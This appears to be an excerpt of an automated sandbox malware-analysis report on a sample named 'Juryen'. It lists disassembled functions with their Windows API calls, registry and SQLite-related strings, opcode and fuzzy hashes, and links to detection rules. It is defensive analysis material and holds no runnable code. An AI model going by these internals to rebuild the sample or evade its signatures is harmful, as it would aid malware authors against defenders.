                                                                    Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                    • memset.MSVCRT ref: 00405455
                                                                    • memset.MSVCRT ref: 0040546C
                                                                    • memset.MSVCRT ref: 00405483
                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$memcpy$ErrorLast
                                                                    • String ID: 6$\
                                                                    • API String ID: 404372293-1284684873
                                                                    • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                    • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                    • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                    • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                    Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                    • wcscpy.MSVCRT ref: 0040A0D9
                                                                    • wcscat.MSVCRT ref: 0040A0E6
                                                                    • wcscat.MSVCRT ref: 0040A0F5
                                                                    • wcscpy.MSVCRT ref: 0040A107
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                    • String ID:
                                                                    • API String ID: 1331804452-0
                                                                    • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                    • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                    • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                    • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                    Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                    • String ID: advapi32.dll
                                                                    • API String ID: 2012295524-4050573280
                                                                    • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                    • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                    • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                    • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                    Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • <%s>, xrefs: 004100A6
                                                                    • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_snwprintf
                                                                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                    • API String ID: 3473751417-2880344631
                                                                    • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                    • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                    • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                    • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                    Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: wcscat$_snwprintfmemset
                                                                    • String ID: %2.2X
                                                                    • API String ID: 2521778956-791839006
                                                                    • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                    • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                    • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                    • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                    Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintfwcscpy
                                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                                    • API String ID: 999028693-502967061
                                                                    • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                    • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                    • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                    • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                    Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 00408DFA
                                                                      • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                    • memset.MSVCRT ref: 00408E46
                                                                    • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                    • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memsetstrlen
                                                                    • String ID:
                                                                    • API String ID: 2350177629-0
                                                                    • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                    • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                    • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                    • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                    Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                    • API String ID: 2221118986-1606337402
                                                                    • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                    • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                    • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                    • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                    Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                    • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                    • memset.MSVCRT ref: 00408FD4
                                                                    • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                    • memset.MSVCRT ref: 00409042
                                                                    • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                      • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                    • String ID:
                                                                    • API String ID: 265355444-0
                                                                    • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                    • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                    • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                    • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                    Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                      • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                      • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                    • memset.MSVCRT ref: 0040C439
                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                    • _wcsupr.MSVCRT ref: 0040C481
                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                    • memset.MSVCRT ref: 0040C4D0
                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                    • String ID:
                                                                    • API String ID: 4131475296-0
                                                                    • Opcode ID: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                                    • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                    • Opcode Fuzzy Hash: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                                    • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                    Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004116FF
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                      • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                    • API String ID: 2618321458-3614832568
                                                                    • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                    • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                    • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                    • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                    Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFilefreememset
                                                                    • String ID:
                                                                    • API String ID: 2507021081-0
                                                                    • Opcode ID: 7cf80b7bcafbae618536fb4bc093b34167423ba0ffe002ce62182f5d73f8b864
                                                                    • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                    • Opcode Fuzzy Hash: 7cf80b7bcafbae618536fb4bc093b34167423ba0ffe002ce62182f5d73f8b864
                                                                    • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                    Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                    • malloc.MSVCRT ref: 00417524
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                    • free.MSVCRT ref: 00417544
                                                                    • free.MSVCRT ref: 00417562
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                    • String ID:
                                                                    • API String ID: 4131324427-0
                                                                    • Opcode ID: 0b5abdb1f50a43c92236d4af65df84c42422b68fc3826eb4b9ca135c63c32c08
                                                                    • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                    • Opcode Fuzzy Hash: 0b5abdb1f50a43c92236d4af65df84c42422b68fc3826eb4b9ca135c63c32c08
                                                                    • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                    Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                    • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                    • free.MSVCRT ref: 0041822B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: PathTemp$free
                                                                    • String ID: %s\etilqs_$etilqs_
                                                                    • API String ID: 924794160-1420421710
                                                                    • Opcode ID: c9d5b5596c1dde7ff1a933dde4a77cb6db406228a744c63c7018c69b2ff3a246
                                                                    • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                    • Opcode Fuzzy Hash: c9d5b5596c1dde7ff1a933dde4a77cb6db406228a744c63c7018c69b2ff3a246
                                                                    • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                    Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040FDD5
                                                                      • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                    • _snwprintf.MSVCRT ref: 0040FE1F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                    • API String ID: 1775345501-2769808009
                                                                    • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                    • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                    • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                    • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                    Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • wcscpy.MSVCRT ref: 0041477F
                                                                    • wcscpy.MSVCRT ref: 0041479A
                                                                    • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                    • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
